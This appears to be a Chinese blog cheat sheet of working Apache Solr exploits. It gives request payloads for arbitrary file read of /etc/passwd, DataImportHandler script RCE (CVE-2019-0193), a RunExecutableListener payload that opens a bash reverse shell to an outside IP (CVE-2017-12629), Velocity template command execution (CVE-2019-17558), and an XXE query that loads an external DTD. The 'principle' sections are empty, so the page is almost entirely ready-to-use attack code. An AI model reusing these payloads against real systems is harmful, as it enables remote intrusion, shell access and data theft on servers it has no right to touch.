1.solr任意文件读取:
操作技巧:
先获取core的名字:
http://example.com/solr/admin/cores?indexInfo=false&wt=json
在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)
http://example.com/solr/'name'/config
{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
exp:
http://192.168.110.129:8983/solr/'name'/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd
漏洞原理:
漏洞版本:
Apache Solr <= 8.8.1
2.solr远程代码执行(CVE-2019-0193)
操作技巧:
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
也可以使用msf的solr进行攻击
漏洞原理:
漏洞版本:Apache Solr < 8.2.0
3.solr远程代码执行(CVE-2017-12629)
操作技巧:
POST /solr/demo/config HTTP/1.1
Host: 192.168.110.129:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 183
{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "bash -i> &/dev/tcp/192.168.10.212/2233 0>&1"]}}
POST /solr/demo/update HTTP/1.1
Host: 192.168.110.129:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 15
[{"id":"test"}]
漏洞原理:
漏洞版本:Apache Solr < 7.1
4.solr注入远程命令执行(CVE-2019-17558)
操作技巧:
先获取core的名字:
http://example.com/solr/admin/cores?indexInfo=false&wt=json
在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)
http://example.com/solr/'name'/config
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
exp:/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Run
time%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.ge
tRuntime().exec(%27hostname%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.
toChars($out.read()))%23end
漏洞原理:
漏洞版本:Apache Solr 5.0.0 ~8.3.1
5.solr的XXE漏洞(CVE-2017-12629)
操作技巧:
/solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f192.168.10.212%2f123
.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser
get传参,只需修改IP和文件名即可
漏洞原理:
漏洞版本:Apache Solr < 7.1
扫一扫
2023
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
